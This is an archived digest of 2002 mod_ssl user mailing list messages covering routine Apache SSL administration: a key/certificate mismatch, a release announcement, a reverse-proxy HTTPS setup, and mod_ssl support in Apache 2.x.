>>> peter.viertel@itaction.co.uk 06/26/02 04:00PM >>>
I think your confusion is in using the cakey when in fact you should use 
the key that you made the cert request from for the Server Private key 
directive....

eg: if you used the following two invocations of  openssl....

openssl genrsa -des3 -out server.key 1024
openssl req -new -key server.key -out server.csr

...then however you get a cert from the csr...(use CA.sh or pay a real 
CA, or sign.sh) . and the cert gets saved as server.crt

then the Apache conf would be:

        SSLCertificateKeyFile conf/ssl.key/server.key
        SSLCertificateFile conf/ssl.crt/server.crt

if I'm not making any sense, then see if the Modssl FAQ is better for 
you : http://www.modssl.org/docs/2.8/ssl_faq.html#cert-real 


Jeff Landers wrote:

>I am getting the key values mismatch error which seems like it should be pretty basic in that they don't match just like it says. However, I remade the CA, cert request, and signed it using the CA.sh -newca, CA.sh -newreq, and CA.sh -sign  which created the cakey.pem and the newcert.pem. I pointed the Server Private Key directive at the cakey.pem and the Server Certificate directive at the newcert.pem  but still get the mismatch error. I searched the archives for this rookie mistake but can't figure out what I am doing wrong. Point me in the right direction, please. Thank you everyone for all of the help in getting this far. Sign me...
>
>Close but no cigar.
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org 
>User Support Mailing List                      modssl-users@modssl.org 
>Automated List Manager                            majordomo@modssl.org 
>  
>


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org 
User Support Mailing List                      modssl-users@modssl.org 
Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 27 06:13:13 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id GAA13812; Thu, 27 Jun 2002 06:10:46 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id GAA13557; Thu, 27 Jun 2002 06:08:06 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 1B2394CE77C; Thu, 27 Jun 2002 03:01:42 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 9495F28692; Wed, 26 Jun 2002 22:48:39 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from omnet.leaderofthedot.com id WAA20827; Wed, 26 Jun 2002 22:39:25 +0200 (MET DST)
Received: from admin (admin [65.210.122.21])
	by omnet.leaderofthedot.com (8.11.6+Sun/8.9.1) with ESMTP id g5QKZgN25089
	for ; Wed, 26 Jun 2002 16:35:43 -0400 (EDT)
From: "Marc S." 
To: 
Subject: RE: [ANNOUNCE] mod_ssl 2.8.10 for Apache 1.3.26
Date: Wed, 26 Jun 2002 16:39:20 -0400
Message-ID: <000801c21d51$8d1cb320$157ad241@admin>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.2616
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
In-Reply-To: <20020619114702.GA25148@engelschall.com>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Marc S." 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,

The log still shows 2.8.9

[Wed Jun 26 16:32:10 2002] [notice] Apache/1.3.26 (Unix) PHP/4.2.1
ApacheJServ/1.1.1 mod_ssl/2.8.9 OpenSSL/0.9.6d configured -- resuming
normal operations


Thanks

Marc

-----Original Message-----
From: owner-modssl-announce@modssl.org
[mailto:owner-modssl-announce@modssl.org] On Behalf Of Ralf S.
Engelschall
Sent: Wednesday, June 19, 2002 7:47 AM
To: modssl-announce@modssl.org; modssl-users@modssl.org
Subject: [ANNOUNCE] mod_ssl 2.8.10 for Apache 1.3.26

On demand by the release of Apache 1.3.26 I've made available
mod_ssl 2.8.9. The details are appended below.

Fetch it from:

o http://www.modssl.org/source/
o  ftp://ftp.modssl.org/source/

Yours,
                                       Ralf S. Engelschall
                                       rse@engelschall.com
                                       www.engelschall.com

  Changes with mod_ssl 2.8.9 (27-Mar-2002 to 19-Jun-2002)

   *) Upgraded to Apache 1.3.26.

   *) Support for OpenSSL 0.9.7.

   *) Open random files in binary mode under Win32 to not
      stop on EOS characters.

   *) Additional internal consistency check on vhost sanity checking
      in case no DNS entries are found for virtual hosts.

   *) Fixed detection of a faked "Faked Basic Auth" situation for
      internal redirection situations.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
Official Announcement Mailing List          modssl-announce@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 27 06:15:13 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id GAA14526; Thu, 27 Jun 2002 06:14:24 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from hotmail.com id GAA14337; Thu, 27 Jun 2002 06:13:26 +0200 (MET DST)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC;
	 Wed, 26 Jun 2002 17:41:03 -0700
X-Originating-IP: [209.139.218.221]
From: "Michael" 
To: 
Subject: Reverse Proxy https question
Date: Wed, 26 Jun 2002 17:39:23 -0700
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_00A3_01C21D38.68B37280"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Message-ID: 
X-OriginalArrivalTime: 27 Jun 2002 00:41:03.0805 (UTC) FILETIME=[510D0ED0:01C21D73]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Michael" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_00A3_01C21D38.68B37280
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

I am trying to Reverse Proxy HTTPS connections in the following manner:

CLIENT Browser (https://secure-site.com) -> Apache 2.0 Reverse Proxy, =
posing as secure-site.com (non-ssl, non-decrypting, just passing the =
https through) -> Sonicwall SSL Accelerator (a stand-alone HW device for =
 SSL decryption/encryption, hosting the certificate for secure-site.com, =
decrypting the SSL connection) -> WEBSERVER (non-SSL)

The purpose for this design is to keep the webserver behind a layer of =
switches (for VLANS and ACLS) and Cisco Content Servers (which act as a =
router and load balancer) and keep the Apache proxy server as the "edge =
presence" of the website.=20

What happens with this configuration is:
1) The client browser connects to the Apache proxy
2) The Apache proxy server connects to the SSL accelerator with HTTPS =
sucessfully, as seen in the debug-level Apache log files.=20
3) The browser waits, waits and waits...
4) The Apache proxy sits, sits and sits.=20
5) The Webserver DOES see the non-ssl connection. The information in the =
access log is:
    "Client IPAddress - - [25/Jun/2002:17:04:18 -0700] "?L / HTTP/1.0" =
302 0 "
5) Eventually the client browser gives up and times out.

If I install the certificate for secure-site.com on the Apache reverse =
proxy server and enable SSL , then the Apache reverse proxy will connect =
with SSL to both the browser and the downstream webserver. This works, =
but is pointless as it loads the Proxy server's CPU with SSL =
encryption/decryption. That's what we have the SSL accelerators for.


What is missing in my config? Is this setup even possible?
Any comments?

Thanks in advance.

-Michael


--------------


This is the Apache config I am using:
----------
Listen IPAddress:443
LogLevel debug

        SSLProxyEngine On
        ServerName              web-site
        ProxyPass               /       https://secure-site.com
        ProxyPassReverse        /       https://secure-site.com



------------
Server version: Apache/2.0.39
Server built:   Jun 25 2002 16:11:49

-----------
Compiled in modules:
  core.c
  mod_access.c
  mod_auth.c
  mod_include.c
  mod_log_config.c
  mod_env.c
  mod_setenvif.c
  mod_proxy.c
  proxy_connect.c
  proxy_ftp.c
  proxy_http.c
  mod_ssl.c
  prefork.c
  http_core.c
  mod_mime.c
  mod_status.c
  mod_autoindex.c
  mod_asis.c
  mod_cgi.c
  mod_negotiation.c
  mod_dir.c
  mod_imap.c
  mod_actions.c
  mod_userdir.c
  mod_alias.c
  mod_so.c

------=_NextPart_000_00A3_01C21D38.68B37280
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable













I am trying to Reverse Proxy HTTPS =
connections=20
in the following manner:


 


CLIENT Browser (https://secure-site.com) -> =
Apache 2.0=20
Reverse Proxy, posing as secure-site.com (non-ssl, non-decrypting, just =
passing=20
the https through) -> Sonicwall SSL Accelerator (a stand-alone HW =
device=20
for  SSL decryption/encryption, hosting the certificate=20
for secure-site.com, decrypting the SSL connection) -> WEBSERVER =

(non-SSL)


 


The purpose for this design is to keep the webserver behind a layer =
of=20
switches (for VLANS and ACLS) and Cisco Content Servers (which act as a =
router=20
and load balancer) and keep the Apache proxy server as the "edge =
presence" of=20
the website. 


 


What happens with this configuration=20
is:


1) The client browser connects to the =
Apache=20
proxy


2) The Apache proxy server connects to =
the SSL=20
accelerator with HTTPS sucessfully, as seen in the debug-level Apache =
log files.=20



3) The browser waits, waits and=20
waits...


4) The Apache proxy sits, sits and =
sits.=20



5) The Webserver DOES see the non-ssl =
connection.=20
The information in the access log is:


    "Client =
IPAddress - -=20
[25/Jun/2002:17:04:18 -0700] "=80L / HTTP/1.0" 302 0 "


5) Eventually the client browser gives =
up and times=20
out.


 


If I install the certificate for secure-site.com on the Apache =
reverse=20
proxy server and enable SSL , then the Apache reverse proxy will =
connect=20
with SSL to both the browser and the downstream webserver. This works, =
but is=20
pointless as it loads the Proxy server's CPU with SSL =
encryption/decryption.=20
That's what we have the SSL accelerators for.


 


 


What is missing in my config? Is this =
setup even=20
possible?


Any comments?


 


Thanks in advance.


 


-Michael


 


 


--------------


 


 




This is the Apache config I am =
using:


----------


Listen IPAddress:443


LogLevel debug


<VirtualHost=20
IPAddress:443>
        =
SSLProxyEngine=20
On
       =20
ServerName          &nb=
sp;  =20
web-site
       =20
ProxyPass          &nbs=
p;   =20
/       https://secure-site.com
=


       =20
ProxyPassReverse       =20
/       https://secure-site.com
=


</VirtualHost>


 


 


------------


Server version: Apache/2.0.39
Server =

built:   Jun 25 2002 16:11:49


 


-----------


Compiled in modules:
  =
core.c
 =20
mod_access.c
  mod_auth.c
  mod_include.c
 =20
mod_log_config.c
  mod_env.c
  mod_setenvif.c
 =20
mod_proxy.c
  proxy_connect.c
  proxy_ftp.c
 =20
proxy_http.c
  mod_ssl.c
  prefork.c
 =20
http_core.c
  mod_mime.c
  mod_status.c
 =20
mod_autoindex.c
  mod_asis.c
  mod_cgi.c
 =20
mod_negotiation.c
  mod_dir.c
  mod_imap.c
 =20
mod_actions.c
  mod_userdir.c
  mod_alias.c
 =20
mod_so.c


------=_NextPart_000_00A3_01C21D38.68B37280--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 27 14:25:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id OAA06775; Thu, 27 Jun 2002 14:24:11 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from smtp.vasco.com id OAA06747; Thu, 27 Jun 2002 14:23:44 +0200 (MET DST)
Received: from 226.balt.vasco.com ([209.140.121.226]) by smtp.vasco.com with Microsoft SMTPSVC(5.0.2195.4905);
	 Thu, 27 Jun 2002 14:26:15 +0200
From: "Aryeh Katz" 
To: modssl-users@modssl.org
Received: from espanol.sytrix.com by 226.balt.vasco.com
          via smtpd (for [62.58.124.117]) with SMTP; 27 Jun 2002 12:23:40 UT
Date: Thu, 27 Jun 2002 08:23:59 -0400
MIME-Version: 1.0
Subject: Re: Reverse Proxy https question
Message-ID: <3D1ACB9F.16587.42819858@localhost>
In-reply-to: 
X-mailer: Pegasus Mail for Windows (v4.01)
Content-type: text/plain; charset=ISO-8859-1
Content-description: Mail message body
X-OriginalArrivalTime: 27 Jun 2002 12:26:16.0017 (UTC) FILETIME=[D5183C10:01C21DD5]
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from Quoted-printable to 8bit by opensource.ee.ethz.ch id OAA06770
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Aryeh Katz" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I don't understand something.
If the Apache proxy server is not going to decrypt the packets, how will it know where to send it? 
Aryeh
> I am trying to Reverse ProxyHTTPS connections in the following 
> manner:
> 
> CLIENT Browser (https://secure-site.com) -> Apache 2.0 Reverse Proxy,
> posing as secure-site.com (non-ssl, non-decrypting, just passing the
> https through) -> Sonicwall SSL Accelerator (a stand-alone HW device
> for SSL decryption/encryption, hosting the certificate forsecure-
> site.com, decrypting the SSL connection) -> WEBSERVER (non-SSL)
> 
> The purpose for this design is to keep the webserver behind a layer of
> switches (for VLANS and ACLS) and Cisco Content Servers (which act as
> a router and load balancer) and keep the Apache proxy server as the
> "edge presence" of the website. 
> 
> What happens with this configuration is:
> 1) The client browser connects to the Apache proxy
> 2) The Apache proxy server connects to the SSL accelerator with HTTPS
> sucessfully, as seen in the debug-level Apache log files. 3) The
> browser waits, waits and waits... 4) The Apache proxy sits, sits and
> sits. 5) The Webserver DOES see the non-ssl connection. The
> information in the access log is:
>  "Client IPAddress- - [25/Jun/2002:17:04:18 -0700] "€L / 
> HTTP/1.0" 302 0 "
> 5) Eventually the client browser gives up and times out.
> 
> If I install the certificate for secure-site.com on the Apache 
> reverse proxy server and enable SSL, then the Apache reverse proxy
> will connect with SSL to both the browser and the downstream
> webserver. This works, but is pointless as it loads the Proxy server's
> CPU with SSL encryption/decryption. That's what we have the SSL
> accelerators for.
> 
> 
> What is missing in my config? Is this setup even possible?
> Any comments?
> 
> Thanks in advance.
> 
> -Michael
> 
> 
> --------------
> 
> 
> This is the Apache config I am using:
> ----------
> Listen IPAddress:443
> LogLevel debug
> 
>  SSLProxyEngine On
>  ServerName web-site
>  ProxyPass / https://secure-site.com
>  ProxyPassReverse / https://secure-site.com
> 
> 
> 
> ------------
> Server version: Apache/2.0.39
> Server built: Jun 25 2002 16:11:49
> 
> -----------
> Compiled in modules:
>  core.c
>  mod_access.c
>  mod_auth.c
>  mod_include.c
>  mod_log_config.c
>  mod_env.c
>  mod_setenvif.c
>  mod_proxy.c
>  proxy_connect.c
>  proxy_ftp.c
>  proxy_http.c
>  mod_ssl.c
>  prefork.c
>  http_core.c
>  mod_mime.c
>  mod_status.c
>  mod_autoindex.c
>  mod_asis.c
>  mod_cgi.c
>  mod_negotiation.c
>  mod_dir.c
>  mod_imap.c
>  mod_actions.c
>  mod_userdir.c
>  mod_alias.c
>  mod_so.c
> 
> 
> 


---
Aryeh Katz
VASCO 			
www.vasco.com		

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 27 15:19:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA12540; Thu, 27 Jun 2002 15:18:10 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id PAA12523; Thu, 27 Jun 2002 15:18:04 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 9731C4CE794; Thu, 27 Jun 2002 15:00:06 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id AB3782874D; Thu, 27 Jun 2002 14:55:46 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from pandora.tiscali.nl id OAA08348; Thu, 27 Jun 2002 14:40:54 +0200 (MET DST)
Received: by pandora.tiscali.nl (Postfix, from userid 200)
	id 3455B675C85; Thu, 27 Jun 2002 01:33:14 +0200 (MET DST)
Received: from notebook.zonnet.nl (unknown [195.241.171.47])
	by pandora.tiscali.nl (Postfix) with ESMTP
	id 6FAB441BA7; Thu, 27 Jun 2002 01:33:10 +0200 (MET DST)
Message-Id: <4.3.2.7.2.20020626134108.027a6ef0@pop3.zonnet.nl>
X-Sender: ouwerkerk92@pop3.zonnet.nl
X-Mailer: QUALCOMM Windows Eudora Version 4.3.2
Date: Thu, 27 Jun 2002 01:16:28 +0200
To: "R. DuFresne" 
From: "B. van Ouwerkerk" 
Subject: Re: apache 2.0 hates older linux kernels:
Cc: modssl-users@modssl.org
In-Reply-To: 
References: <4.3.2.7.2.20020624141256.04526ee0@pop.atz-hosting.nl>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "B. van Ouwerkerk" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


>Umm, yers might be considered older in relative terms, but, I'm using a
>slackware 3.6 version on the box I'm trying to work on, so the kernel is a
>patched up 2.0.35-6 derivative, older yet then the 7.1 slackware/2.2.16
>kernel you are working on there.

You're right. Dunno what made me see/think 2.2.16 as older then 2.0.35

Sorry.

Bye,



B.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 27 15:19:14 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA12546; Thu, 27 Jun 2002 15:18:14 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id PAA12524; Thu, 27 Jun 2002 15:18:04 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 6B8EA4CE792; Thu, 27 Jun 2002 15:00:06 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id F3D05287D7; Thu, 27 Jun 2002 14:55:38 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from tajfun.atc.cz id OAA07947; Thu, 27 Jun 2002 14:36:30 +0200 (MET DST)
From: fasa@email.cz
X-atco-email: fasa@email.cz
Received: from www.email.cz by smtp.email.cz with SMTP; Thu, 27 Jun 2002
 14:36:18 +0200 (CEST)
MIME-Version: 1.0
Message-Id: <3D1B06C2.000001.08795@email1.atc.cz>
Date: Thu, 27 Jun 2002 14:36:18 +0200 (CEST)
To: , 
Subject: Question about SSL for Apache 2.x
X-mailer: ATC ORGANIZER v3
Content-Type: Text/Plain;
  charset=iso-8859-2
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id OAA08011
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: fasa@email.cz
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Dear SSL companies,

we are university students team from Czech Republic and we provide some expert system based on Apache web server, but now we have some problem about SSL.

Now we can install on our server Apache 2.x version but we need for this wersion some SSL support.

When we inspect your pages, we get informations about versions for Apache 1.3.x.

And we have a question if will be some available version for Apache 2.x or we need to install some older version.

Thank you for your time for response of our question


Best regards,


Bc. Radoslav Fasuga
student team manager departmet of computer science

VSB-TU Ostrava Technical University
www.vsb.cz

contact email: fasa@email.cz

______________________________________________________________________________
Nejlep¹í produkty firem Compaq a HP na http://www.compaqplus.cz/novehp
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 27 15:33:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA14112; Thu, 27 Jun 2002 15:32:34 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from mail.espgroup.net id PAA14049; Thu, 27 Jun 2002 15:31:51 +0200 (MET DST)
Received: from no.name.available by mail.espgroup.net
          via smtpd (for opensource-01.ee.ethz.ch [129.132.7.153]) with SMTP; 27 Jun 2002 13:30:41 UT
Received: (private information removed)
Received: from [63.66.134.226] by brickwall.espgroup.net
          via smtpd (for [10.3.1.2]) with SMTP; 27 Jun 2002 13:30:39 UT
Message-ID: <3D1B14AF.8090600@espgroup.net>
Date: Thu, 27 Jun 2002 09:35:43 -0400
From: "Dwayne Miller" 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.0rc1) Gecko/20020417
X-Accept-Language: en,pdf
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Question about SSL for Apache 2.x
References: <3D1B06C2.000001.08795@email1.atc.cz>
Content-Type: text/plain; charset=ISO-8859-2; format=flowed
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Dwayne Miller" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

SSL is included in the source for Apache 2.0.  You will need to 
download, compile and install OpenSSL found at www.openssl.org and then 
build the mod_ssl module found in httpd/modules/ssl.  I can never 
remember where the instructions are found for setting up the source tree 
to build... perhaps someone else can help with that.

dobry den

fasa@email.cz wrote:

>Dear SSL companies,
>
>we are university students team from Czech Republic and we provide some expert system based on Apache web server, but now we have some problem about SSL.
>
>Now we can install on our server Apache 2.x version but we need for this wersion some SSL support.
>
>When we inspect your pages, we get informations about versions for Apache 1.3.x.
>
>And we have a question if will be some available version for Apache 2.x or we need to install some older version.
>
>Thank you for your time for response of our question
>
>
>Best regards,
>
>
>Bc. Radoslav Fasuga
>student team manager departmet of computer science
>
>VSB-TU Ostrava Technical University
>www.vsb.cz
>
>contact email: fasa@email.cz
>
>______________________________________________________________________________
>Nejlep¹í produkty firem Compaq a HP na http://www.compaqplus.cz/novehp
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>  
>


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 27 15:37:15 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA14445; Thu, 27 Jun 2002 15:35:37 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from vega.fmf.uni-lj.si id PAA14359; Thu, 27 Jun 2002 15:34:37 +0200 (MET DST)
Received: (qmail 21260 invoked by uid 0); 27 Jun 2002 13:25:05 -0000
Received: from kristijan@rip-computer.si by vega.fmf.uni-lj.si
	 by uid 100 with qmail-scanner-1.10 (sweep: 2.9/3.54. . Clear:0. Processed in 3.228957 secs); 27 Jun 2002 13:25:05 -0000
X-Virus-Scan: by vega.fmf.uni-lj.si (sweep: 2.9/3.54. )
Received: from vs3.fmf.uni-lj.si (HELO 127.0.0.1) (193.2.110.18)
  by 0 with SMTP; 27 Jun 2002 13:25:01 -0000
Date: Thu, 27 Jun 2002 15:32:54 +0200
From: Kristijan Cafuta RIP 
X-Mailer: The Bat! (v1.60m) Personal
X-Priority: 3 (Normal)
Message-ID: <1566654994.20020627153254@rip-computer.si>
To: "fasa@email.cz" 
Subject: Re: Question about SSL for Apache 2.x
In-Reply-To: <3D1B06C2.000001.08795@email1.atc.cz>
References: <3D1B06C2.000001.08795@email1.atc.cz>
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-2
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Kristijan Cafuta RIP 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

ModSSL is now a part of Apache 2... just compile it with SSL
support...

fec> Dear SSL companies,

fec> we are university students team from Czech Republic and we provide some expert system based on Apache web server, but now we have some problem about SSL.

fec> Now we can install on our server Apache 2.x version but we need for this wersion some SSL support.

fec> When we inspect your pages, we get informations about versions for Apache 1.3.x.

fec> And we have a question if will be some available version for Apache 2.x or we need to install some older version.

fec> Thank you for your time for response of our question


fec> Best regards,


fec> Bc. Radoslav Fasuga
fec> student team manager departmet of computer science

fec> VSB-TU Ostrava Technical University
fec> www.vsb.cz

fec> contact email: fasa@email.cz

fec> ______________________________________________________________________________
fec> Nejlep¹í produkty firem Compaq a HP na http://www.compaqplus.cz/novehp
fec> ______________________________________________________________________
fec> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
fec> User Support Mailing List                      modssl-users@modssl.org
fec> Automated List Manager                            majordomo@modssl.org


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 27 16:46:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA21943; Thu, 27 Jun 2002 16:45:20 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from enroque.rawbyte.com id QAA21865; Thu, 27 Jun 2002 16:44:37 +0200 (MET DST)
Received: by enroque.rawbyte.com (Postfix, from userid 501)
	id ECC7522066; Thu, 27 Jun 2002 07:37:02 -0700 (PDT)
Date: Thu, 27 Jun 2002 07:37:02 -0700
From: Daniel Lopez 
To: modssl-users@modssl.org
Subject: Re: Question about SSL for Apache 2.x
Message-ID: <20020627143702.GB10945@rawbyte.com>
References: <3D1B06C2.000001.08795@email1.atc.cz>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <3D1B06C2.000001.08795@email1.atc.cz>
User-Agent: Mutt/1.3.28i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Daniel Lopez 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


> Dear SSL companies,
> 
> we are university students team from Czech Republic and we provide some expert system based on Apache web server, but now we have some problem about SSL.
> 
> Now we can install on our server Apache 2.x version but we need for this wersion some SSL support.
> 
> When we inspect your pages, we get informations about versions for Apache 1.3.x.
> 
> And we have a question if will be some available version for Apache 2.x or we need to install some older version.

mod_ssl is already included with Apache 2. For instructions on getting mod_ssl
working with 2.0, you can checkout

http://www.apacheworld.org/ty24/site.chapter17.html

Cheers

Daniel
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 27 20:16:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA18531; Thu, 27 Jun 2002 20:15:26 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from rock.tumko.org id UAA18413; Thu, 27 Jun 2002 20:14:19 +0200 (MET DST)
Received: from rock.tumko.org (rock [127.0.0.1])
	by rock.tumko.org (8.12.5/8.12.5) with ESMTP id g5RIEGrQ012721
	(version=TLSv1/SSLv3 cipher=EDH-RSA-DES-CBC3-SHA bits=168 verify=NO)
	for ; Thu, 27 Jun 2002 11:14:16 -0700
Received: (from ded_subs@localhost)
	by rock.tumko.org (8.12.5/8.12.5/Submit) id g5RIEBXx012720;
	Thu, 27 Jun 2002 11:14:11 -0700
Date: Thu, 27 Jun 2002 11:14:11 -0700
Message-Id: <200206271814.g5RIEBXx012720@rock.tumko.org>
From: Alex 
To: modssl-users@modssl.org
Subject: Re: 56-bit/128-bit IE problems
In-Reply-To: <00c301c21939$c5e8e500$5a2b7ad8@expertrade.com>
X-Newsgroups: lists.modssl.users
User-Agent: tin/1.5.12-20020427 ("Sugar") (UNIX) (Linux/2.4.19-pre10 (i686))
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Alex 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

In article <00c301c21939$c5e8e500$5a2b7ad8@expertrade.com> David Wall wrote:
> You could also consider getting a Thawte "super cert" which has a capability
> to allow the 56-bit export version of IE to not be so stupid and connect at
> the higher 128-bit when accessing your site.

Could somebody please explain (or point me to URL) how this Thawte "super cert"
works? With quick search I found only general info with no technical details..

Thanks..

Alex
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 27 20:32:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA20388; Thu, 27 Jun 2002 20:31:28 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from darkstar.sysinfo.com id UAA20331; Thu, 27 Jun 2002 20:30:47 +0200 (MET DST)
Received: from localhost (dufresne@localhost)
	by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id OAA02745;
	Thu, 27 Jun 2002 14:30:23 -0400
Date: Thu, 27 Jun 2002 14:30:23 -0400 (EDT)
From: "R. DuFresne" 
To: Alex 
cc: modssl-users@modssl.org
